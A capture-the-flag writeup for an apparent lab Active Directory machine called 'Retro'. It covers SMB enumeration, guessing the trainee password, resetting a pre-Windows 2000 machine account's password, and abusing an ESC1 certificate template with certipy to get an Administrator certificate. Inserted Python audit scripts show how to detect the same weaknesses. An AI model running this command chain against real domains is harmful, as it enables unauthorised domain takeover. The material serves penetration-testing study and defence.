Retro

Writeup

Enumeration

nmap -sCV 10.129.117.252 --open

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-24 19:25:32Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after:  2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-06-24T19:26:11+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-04-08T01:55:44
|_Not valid after:  2025-10-08T01:55:44
|_ssl-date: 2025-06-24T19:26:50+00:00; -1s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

We can see that SMB (port 445) is open, so let's check that first.

nxc smb 10.129.117.252 -u '.' -p '' --shares
SMB         10.129.117.252  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.129.117.252  445    DC               [+] retro.vl\.:
SMB         10.129.117.252  445    DC               [*] Enumerated shares
SMB         10.129.117.252  445    DC               Share           Permissions     Remark
SMB         10.129.117.252  445    DC               -----           -----------     ------
SMB         10.129.117.252  445    DC               ADMIN$                          Remote Admin
SMB         10.129.117.252  445    DC               C$                              Default share
SMB         10.129.117.252  445    DC               IPC$            READ            Remote IPC
SMB         10.129.117.252  445    DC               NETLOGON                        Logon server share
SMB         10.129.117.252  445    DC               Notes
SMB         10.129.117.252  445    DC               SYSVOL                          Logon server share
SMB         10.129.117.252  445    DC               Trainees        READ

With a null session we can read the contents of the Trainees share.

smbclient //10.129.117.252/Trainees -N

Download the Important.txt file and view its contents. It suggests the username is probably trainee and that the password is very likely something easily remembered by a group of people. Try the username as the password.

User Flag

sudo crackmapexec smb 10.129.117.252 -u trainee -p trainee --shares
SMB         10.129.117.252  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.129.117.252  445    DC               [+] retro.vl\trainee:trainee
SMB         10.129.117.252  445    DC               [*] Enumerated shares
SMB         10.129.117.252  445    DC               Share           Permissions     Remark
SMB         10.129.117.252  445    DC               -----           -----------     ------
SMB         10.129.117.252  445    DC               ADMIN$                          Remote Admin
SMB         10.129.117.252  445    DC               C$                              Default share
SMB         10.129.117.252  445    DC               IPC$            READ            Remote IPC
SMB         10.129.117.252  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.117.252  445    DC               Notes           READ
SMB         10.129.117.252  445    DC               SYSVOL          READ            Logon server share
SMB         10.129.117.252  445    DC               Trainees        READ

As trainee we can now also read the Notes share.

Download user.txt to get our first flag.

Root Flag

nxc smb 10.129.117.252 -u 'trainee' -p 'trainee' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

From the RID brute force (enumerating the RIDs of domain objects with netexec) we learn the name of an old machine account that was created with pre-Windows 2000 compatibility. Machine account names end with $.

We need to change the password of that machine account. Read this for more information: Diving into Pre-Created Computer Accounts.

wget https://raw.githubusercontent.com/fortra/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

python3 rpcchangepwd.py retro.vl/BANKING\$:banking@10.129.117.252 -newpass 123
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[*] Password was changed successfully.
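The two steps above (pick the machine accounts out of the RID brute force, then recognise the one that still has its pre-Windows 2000 default) are easy to turn into an audit check. The following is an added example, not code from the writeup, netexec or Impacket: it reimplements the grep/awk pipeline over a constructed sample of `--rid-brute` output, and then flags computer objects whose `userAccountControl` carries both WORKSTATION_TRUST_ACCOUNT and PASSWD_NOTREQD (decimal 4128, the indicator commonly used for accounts created with "Assign this computer account as a pre-Windows 2000 computer") and that have never logged on. The LDAP records it checks are constructed to look like the result of a search over `(objectClass=computer)`; the account names and values are sample data.

```python
"""Audit helper for pre-created (pre-Windows 2000) computer accounts.

Added example, not part of the original writeup. Sample data is constructed.
"""

# userAccountControl bits (documented Microsoft values).
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000

# Constructed excerpt shaped like `nxc smb --rid-brute` output: "RID: DOMAIN\name (type)".
SAMPLE_RID_OUTPUT = """\
SMB         10.129.117.252  445    DC               500: RETRO\\Administrator (SidTypeUser)
SMB         10.129.117.252  445    DC               512: RETRO\\Domain Admins (SidTypeGroup)
SMB         10.129.117.252  445    DC               1000: RETRO\\DC$ (SidTypeUser)
SMB         10.129.117.252  445    DC               1103: RETRO\\trainee (SidTypeUser)
SMB         10.129.117.252  445    DC               1104: RETRO\\BANKING$ (SidTypeUser)
"""

# Constructed records shaped like an LDAP search over (objectClass=computer).
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128, "logonCount": 0},
    {"sAMAccountName": "WS01$", "userAccountControl": 4096, "logonCount": 57},
    {"sAMAccountName": "OLDSRV$", "userAccountControl": 4130, "logonCount": 0},  # disabled
    {"sAMAccountName": "DC$", "userAccountControl": 532480, "logonCount": 1203},
]


def parse_rid_brute_users(output):
    """Same result as the grep/awk pipeline in the writeup: the account name
    from every SidTypeUser line (text after the backslash, up to a space)."""
    users = []
    for line in output.splitlines():
        if "SidTypeUser" not in line:
            continue
        for token in line.split():
            if "\\" in token:
                users.append(token.split("\\", 1)[1])
                break
    return users


def machine_accounts(users):
    """Machine accounts are the names ending with '$'."""
    return [u for u in users if u.endswith("$")]


def is_pre2k_candidate(record):
    """Enabled computer object with WORKSTATION_TRUST_ACCOUNT + PASSWD_NOTREQD
    set (decimal 4128) that has never logged on: the profile of a pre-created
    account whose password is still the default."""
    uac = int(record["userAccountControl"])
    if uac & ACCOUNTDISABLE:
        return False
    if not (uac & WORKSTATION_TRUST_ACCOUNT) or not (uac & PASSWD_NOTREQD):
        return False
    return int(record.get("logonCount", 0)) == 0


def find_pre2k_accounts(records):
    return [r["sAMAccountName"] for r in records if is_pre2k_candidate(r)]


def default_password_for(sam_account_name):
    """The password a pre-created account starts with: the lowercase computer
    name without the trailing '$' (BANKING$ -> banking, as used in the writeup).
    A defender can confirm a finding with one bind attempt using this value."""
    return sam_account_name.rstrip("$").lower()


if __name__ == "__main__":
    users = parse_rid_brute_users(SAMPLE_RID_OUTPUT)
    print("users:", users)
    print("machine accounts:", machine_accounts(users))
    for name in find_pre2k_accounts(SAMPLE_COMPUTERS):
        print(f"pre-2000 candidate: {name} (expected default password: {default_password_for(name)})")
```

The remediation for every account this flags is the one the writeup's next step forces from the attacker's side: set a fresh password (or delete the object if the machine never joined), and clear the PASSWD_NOTREQD bit while doing so.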

Read this for more information on ESC1: Abusing Active Directory Certificate Services.

Templates vulnerable to ESC1 have the following configurations:

    Client Authentication: True
    Enabled: True
    Enrollee Supplies Subject: True
    Requires Management Approval: False
    Authorized Signatures Required: 0
certipy find -u 'BANKING$' -p '123' -dc-ip 10.129.117.252 -vulnerable -enabled

Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates                                                                                                                                      
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
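The ESC1 conditions listed earlier can be checked mechanically, which is useful when reviewing every template in a domain rather than reading Certipy output by eye. The block below is an added example and is not code from the writeup or from Certipy: it parses the "Certificate Templates" section of `certipy find` text output (the embedded excerpt is constructed to match the layout shown above, with a second, non-vulnerable template added for contrast), applies the five conditions plus the enrollment-rights test that Certipy's own finding text mentions (a low-privileged principal such as Domain Computers must be able to enroll), and applies the same rule to the raw LDAP attributes of a template object so the check can also run without Certipy. The flag bit values and EKU OIDs are Microsoft-documented constants; the template names and ACLs in the sample are constructed.

```python
"""ESC1 check over Certipy-style template output and over raw AD attributes.

Added example; not part of the writeup and not Certipy's own code.
"""
import re

# msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits (documented values).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # enrollee supplies subject / SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # requires manager approval

# EKUs that make an issued certificate usable for domain authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Groups that any low-privileged user or computer account effectively belongs to.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed excerpt in the shape of `certipy find` text output.
SAMPLE_FIND_OUTPUT = """\
Certificate Templates
  0
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\\Domain Admins
                                          RETRO.VL\\Domain Computers
                                          RETRO.VL\\Enterprise Admins
  1
    Template Name                       : User
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\\Domain Users
"""

TEMPLATE_START = re.compile(r"^\s{2}\d+\s*$")          # "  0", "  1", ...
KEY_VALUE = re.compile(r"^(\s*)(\S.*?)\s*:\s?(.*)$")     # "    Key   : value"


def parse_templates(text):
    """One dict per numbered block; multi-valued fields are newline-joined."""
    templates, current, list_key, list_indent = [], None, None, 0
    for line in text.splitlines():
        if TEMPLATE_START.match(line):
            current, list_key = {}, None
            templates.append(current)
            continue
        if current is None or not line.strip():
            continue
        m = KEY_VALUE.match(line)
        indent = len(line) - len(line.lstrip())
        if m:
            list_key, list_indent = m.group(2), len(m.group(1))
            current[list_key] = m.group(3).strip()
        elif list_key and indent > list_indent:
            current[list_key] += "\n" + line.strip()   # continuation of a list value
        else:
            list_key = None                            # section header such as "Permissions"
    return templates


def principals(field):
    """'RETRO.VL\\Domain Computers' -> 'Domain Computers' for each listed principal."""
    return {p.split("\\", 1)[-1] for p in field.split("\n") if p}


def is_esc1(t):
    """The ESC1 conditions from the writeup plus low-privileged enrollment rights."""
    return (
        t.get("Enabled") == "True"
        and t.get("Client Authentication") == "True"
        and t.get("Enrollee Supplies Subject") == "True"
        and t.get("Requires Manager Approval") == "False"
        and t.get("Authorized Signatures Required") == "0"
        and bool(principals(t.get("Enrollment Rights", "")) & LOW_PRIV_PRINCIPALS)
    )


def is_esc1_ldap(name_flag, enrollment_flag, ra_signatures, ekus, enabled, enrollers):
    """Same rule on raw attributes: msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag,
    msPKI-RA-Signature, pKIExtendedKeyUsage (empty means any purpose), whether a CA
    publishes the template, and the principals holding Enroll in its ACL."""
    return (
        enabled
        and bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        and not (enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)
        and ra_signatures == 0
        and (not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS))
        and bool(set(enrollers) & LOW_PRIV_PRINCIPALS)
    )


def vulnerable_templates(text):
    return [t["Template Name"] for t in parse_templates(text)
            if "Template Name" in t and is_esc1(t)]


if __name__ == "__main__":
    print("ESC1 templates:", vulnerable_templates(SAMPLE_FIND_OUTPUT))
```

Any template this reports should have either "Enrollee Supplies Subject" switched off (so the CA builds the subject from the requester's own AD object) or manager approval enabled, and its Enroll permission should not extend to Domain Computers or Domain Users. On the detection side, issuance of a certificate whose UPN does not match the requesting account (here a machine account requesting Administrator@retro.vl) is the event to alert on.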

certipy req -u 'BANKING$' -p '123' -dc-ip 10.129.117.252 -ca 'retro-DC-CA' -target 10.129.117.252 -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096

certipy auth -pfx administrator.pfx